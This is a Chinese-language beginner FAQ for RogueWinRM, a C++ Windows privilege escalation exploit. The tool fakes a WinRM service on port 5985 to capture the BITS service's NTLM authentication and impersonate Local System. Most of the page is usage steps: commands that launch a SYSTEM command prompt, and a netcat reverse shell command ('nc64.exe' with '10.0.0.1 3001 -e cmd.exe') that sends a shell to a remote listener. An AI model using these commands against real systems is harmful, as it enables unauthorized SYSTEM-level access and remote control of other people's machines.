RogueWinRM 项目常见问题解决方案

RogueWinRM 项目常见问题解决方案

RogueWinRM Windows Local Privilege Escalation from Service Account to System 项目地址: https://gitcode.com/gh_mirrors/ro/RogueWinRM

项目基础介绍

RogueWinRM 是一个本地权限提升漏洞利用工具，允许从一个具有 SeImpersonatePrivilege 的服务账户提升到本地系统账户。如果 WinRM 服务没有运行（默认情况下 Win10 不运行，但 Windows Server 2019 不是），这个工具就可以发挥作用。它会在端口 5985 上监听传入的连接，假装成一个真实的 WinRM 服务。这个工具实际上是一个最小化的 web 服务器，尝试与任何尝试连接该端口的服务进行 NTLM 认证。一旦 BITS 服务（以 Local System 身份运行）尝试向 rogue 监听器认证，我们就能以 Local System 用户的身份模拟，从而以那些权限启动任意的进程。

该项目主要使用的编程语言是 C++。

新手常见问题及解决步骤

问题1：如何运行一个交互式命令提示符？

问题描述：新手可能不知道如何通过 RogueWinRM 运行一个交互式的命令提示符。

解决步骤：

1. 打开命令行工具，例如 cmd 或 PowerShell。
2. 导航到 RogueWinRM 的可执行文件所在的目录。
3. 运行以下命令来启动一个交互式命令提示符：RogueWinRM.exe -p "C:\windows\system32\cmd.exe"。
4. 如果需要指定端口，可以使用 -l 参数，例如：RogueWinRM.exe -p "C:\windows\system32\cmd.exe" -l 5985。

问题2：如何运行一个 netcat 反向 shell？

问题描述：新手可能不清楚如何设置和运行一个 netcat 反向 shell。

解决步骤：

1. 确保你有一个 netcat 可执行文件，并放置在一个可访问的路径下，例如 C:\windows\temp\nc64.exe。
2. 打开命令行工具，导航到 RogueWinRM 的可执行文件所在的目录。
3. 运行以下命令来启动一个 netcat 反向 shell：RogueWinRM.exe -p "C:\windows\temp\nc64.exe" -a "10.0.0.1 3001 -e cmd.exe"。
4. 确保替换 10.0.0.1 和 3001 为你的监听 IP 地址和端口。

问题3：如何启用调试输出？

问题描述：新手可能不知道如何启用调试输出以获得更多的信息。

解决步骤：

1. 打开命令行工具，导航到 RogueWinRM 的可执行文件所在的目录。
2. 运行以下命令来启动 RogueWinRM 并启用调试输出：RogueWinRM.exe -d。
3. 你可以在命令行窗口中看到更详细的输出信息，这对于调试和排错非常有用。

RogueWinRM Windows Local Privilege Escalation from Service Account to System 项目地址: https://gitcode.com/gh_mirrors/ro/RogueWinRM